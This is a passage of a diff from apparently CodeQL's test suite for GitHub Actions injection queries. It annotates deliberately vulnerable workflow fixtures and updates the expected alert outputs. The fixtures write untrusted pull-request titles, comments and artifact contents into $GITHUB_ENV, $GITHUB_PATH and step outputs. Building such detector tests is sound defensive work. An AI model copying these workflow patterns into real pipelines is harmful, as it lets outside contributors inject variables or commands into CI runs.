$GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | @@ -22,12 +31,3 @@ nodes | .github/workflows/output2.yml:53:14:56:19 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\nls *.txt\n | semmle.label | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\nls *.txt\n | | .github/workflows/output2.yml:58:14:62:48 | # VULNERABLE\nCURRENT_VERSION=$(cat gradle.properties \| sed -n '/^version=/ { s/^version=//;p }')\necho "$CURRENT_VERSION"\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\nCURRENT_VERSION=$(cat gradle.properties \| sed -n '/^version=/ { s/^version=//;p }')\necho "$CURRENT_VERSION"\necho "::set-output name=OUTPUT::SAFE"\n | subpaths -#select -| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | -| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | -| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | -| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | -| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_ENV + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml index e4845a6f2f16..0a19c76c769a 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml @@ -12,14 +12,14 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip + - name: Unzip # $ Source[actions/envvar-injection/critical] run: | unzip artifact_name.zip -d foo - name: Env Var Injection run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" cat foo >> "$GITHUB_ENV" - echo "EOF" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml index 67209267b5c5..c157d791f396 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml @@ -12,7 +12,7 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip + - name: Unzip # $ Source[actions/envvar-injection/critical] run: | unzip artifact_name.zip -d foo - run: | @@ -20,7 +20,7 @@ jobs: echo 'JSON_RESPONSE<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml index d22f09c03bdb..c071d54236d7 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml @@ -10,23 +10,23 @@ jobs: - run: echo "${{ github.event.pull_request.title }}" >> $GITHUB_PATH - env: - PATHINJ: ${{ github.event.pull_request.title }} - run: echo $(echo "$PATHINJ") >> $GITHUB_PATH + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo $(echo "$PATHINJ") >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] - env: - PATHINJ: ${{ github.event.pull_request.title }} - run: echo $PATHINJ >> $GITHUB_PATH + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo $PATHINJ >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] - env: - PATHINJ: ${{ github.event.pull_request.title }} - run: echo ${PATHINJ} >> $GITHUB_PATH + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo ${PATHINJ} >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] - uses: dawidd6/action-download-artifact@v2 with: name: artifact_name path: foo - - run: echo "$(cat foo/bar)" >> $GITHUB_PATH + - run: echo "$(cat foo/bar)" >> $GITHUB_PATH # $ Alert[actions/envpath-injection/critical] Source[actions/envpath-injection/critical] - env: ACTIONS_ALLOW_UNSECURE_COMMANDS: true - PATHINJ: ${{ github.event.pull_request.title }} - run: echo "::add-path::$PATHINJ" + PATHINJ: ${{ github.event.pull_request.title }} # $ Source[actions/envpath-injection/critical] + run: echo "::add-path::$PATHINJ" # $ Alert[actions/envpath-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml index f43a12cb42a3..0811e61cfc65 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml @@ -23,6 +23,6 @@ jobs: ref: ${{steps.decide-ref.outputs.ref}} path: "foo" - - name: Read Java Config - run: cat foo/.github/java-config.env >> $GITHUB_ENV + - name: Read Java Config # $ Source[actions/envvar-injection/critical] + run: cat foo/.github/java-config.env >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml index 5edd526d8201..58e0f2edf9c2 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml @@ -18,11 +18,11 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: runtime-versions.md - - name: "Put runtime versions on the environment" + - name: "Put runtime versions on the environment" # $ Source[actions/envvar-injection/critical] id: runtime_versions run: | { echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml index 3a0c4cc91b82..097e3a09a114 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml @@ -43,14 +43,14 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: runtime-versions.md - - name: "Put runtime versions on the environment" + - name: "Put runtime versions on the environment" # $ Source[actions/envvar-injection/critical] id: runtime_versions run: | { echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - name: "Download pre-release report" uses: dawidd6/action-download-artifact@v2 @@ -58,14 +58,14 @@ jobs: run_id: ${{ github.event.workflow_run.id }} name: prerelease-report.md - - name: "Put pre-release report on the environment" + - name: "Put pre-release report on the environment" # $ Source[actions/envvar-injection/critical] id: prerelease_report run: | { echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - name: "Comment on PR with Wrangler link" uses: marocchino/sticky-pull-request-comment@v2 diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml index 78d288fb9822..278cea70f19a 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml @@ -17,7 +17,7 @@ jobs: - name: Get commit message run: | COMMIT_MESSAGE=$(git log --format=%s) - echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV + echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - name: Get commit message run: | - echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV + echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml index 93854c5e889f..5b9bd4e278c7 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml @@ -12,7 +12,7 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} - id: changed-files run: | - echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "${{ env.CHANGED-FILES }}" test2: runs-on: ubuntu-latest @@ -23,7 +23,7 @@ jobs: - id: changed-files run: | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) - echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "${{ env.CHANGED-FILES }}" diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml index 89ecd8c0ec3e..85d6109cd492 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml @@ -9,7 +9,7 @@ jobs: steps: - id: title run: | - echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "$TITLE" test2: runs-on: ubuntu-latest @@ -17,7 +17,7 @@ jobs: - id: title run: | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH}) - echo "BODY=$PR_BODY" >> "$GITHUB_ENV" + echo "BODY=$PR_BODY" >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - run: echo "$TITLE" test3: runs-on: ubuntu-latest diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml index efcfda0e4c76..87a02ca5a1d9 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml @@ -12,12 +12,12 @@ jobs: with: workflow: ${{ github.event.workflow_run.workflow_id }} name: pr_metadata - - run: | + - run: | # $ Source[actions/envvar-injection/critical] # VULNERABLE - echo "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV + echo "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - run: | # VULNERABLE - echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV + echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - run: | # NOT VULNERABLE echo "PR_NUMBER=$(cat pr_number.txt | tr '\n' ' ')" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml index c902b7e61bd2..de66e4cf253f 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml @@ -38,6 +38,6 @@ jobs: }); var fs = require('fs'); fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); - - run: | + - run: | # $ Source[actions/envvar-injection/critical] unzip pr.zip - echo "pr_number=$(cat NR)" >> $GITHUB_ENV + echo "pr_number=$(cat NR)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml index f76454c6088f..5059ee9d0da3 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml @@ -17,7 +17,7 @@ jobs: workflow_conclusion: '' name: pr_metadata if_no_artifact_found: 'ignore' - - run: | + - run: | # $ Source[actions/envvar-injection/critical] echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV - echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV + echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 7b30ec8b7e42..f4c6ebcb5b3c 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -8,43 +8,43 @@ jobs: runs-on: ubuntu-latest steps: - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | - echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | - echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV + echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | - echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV + echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | echo "PR_TITLE<> $GITHUB_ENV echo "$TITLE" >> $GITHUB_ENV - echo "EOF" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" echo "$TITLE" >> "${GITHUB_ENV}" - echo "EOF" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" + } >> "$GITHUB_ENV" # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | cat <<-EOF >> "$GITHUB_ENV" FOO=$TITLE - EOF + EOF # $ Alert[actions/envvar-injection/critical] - env: TITLE: ${{ github.event.pull_request.head.ref }} run: | @@ -52,12 +52,12 @@ jobs: - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV env: TARGET_BRANCH: ${{ github.head_ref }} - - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] env: - TARGET_BRANCH: ${{ github.event.pull_request.title }} - - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV + TARGET_BRANCH: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] + - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] - env: TITLE: |- ${{ github.event.pull_request.title }} diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml index cfc5e6ef1fa5..cdcc49bde91f 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml @@ -27,10 +27,10 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); - - name: 'Unzip code coverage' + - name: 'Unzip code coverage' # $ Source[actions/envvar-injection/critical] run: unzip oc-code-coverage.zip -d coverage - name: set env vars run: | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV echo "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV - echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml index 36340258515e..076941d4aece 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml @@ -8,20 +8,20 @@ jobs: runs-on: ubuntu-latest steps: - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | FOO=${TITLE##*/} - echo PR_TITLE=${FOO} >> $GITHUB_ENV + echo PR_TITLE=${FOO} >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | FOO=$TITLE+ - echo PR_TITLE=$FOO >> $GITHUB_ENV + echo PR_TITLE=$FOO >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | venv="$(echo $TITLE)')" - echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV + echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml index c33c90dbb9c6..f9e0ea8a3245 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml @@ -13,7 +13,7 @@ jobs: run_id: ${{github.event.workflow_run.id}} name: artifact - - name: Load .env file + - name: Load .env file # $ Source[actions/envvar-injection/critical] uses: aarcangeli/load-dotenv@v1.0.0 with: path: 'backend/new' @@ -21,5 +21,5 @@ jobs: .env .env.test quiet: false - if-file-not-found: error + if-file-not-found: error # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml index 806f8dc8e45c..c84dcae914ca 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml @@ -27,13 +27,13 @@ jobs: run_id: ${{ github.event.workflow_run.id }} path: ./artifacts - - name: assignment + - name: assignment # $ Source[actions/envvar-injection/critical] run: | foo=$(cat ./artifacts/parent-artifacts/event.txt) - echo "foo=$foo" >> $GITHUB_ENV + echo "foo=$foo" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - name: direct 1 run: | - echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV + echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - name: direct 2 run: | - echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV + echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml index 3ed80374ef65..6f7d3b9cffcf 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml @@ -24,7 +24,7 @@ jobs: name: event_file path: artifacts/event_file - - name: Try to read PR number + - name: Try to read PR number # $ Source[actions/envvar-injection/critical] id: set-ref run: | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) @@ -38,4 +38,4 @@ jobs: fi echo "pr_num=$pr_num" >> $GITHUB_ENV - echo "ref=$ref" >> $GITHUB_ENV + echo "ref=$ref" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index f544994fc5c1..398a80131733 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected @@ -1,3 +1,9 @@ +#select +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | @@ -16,9 +22,3 @@ nodes | 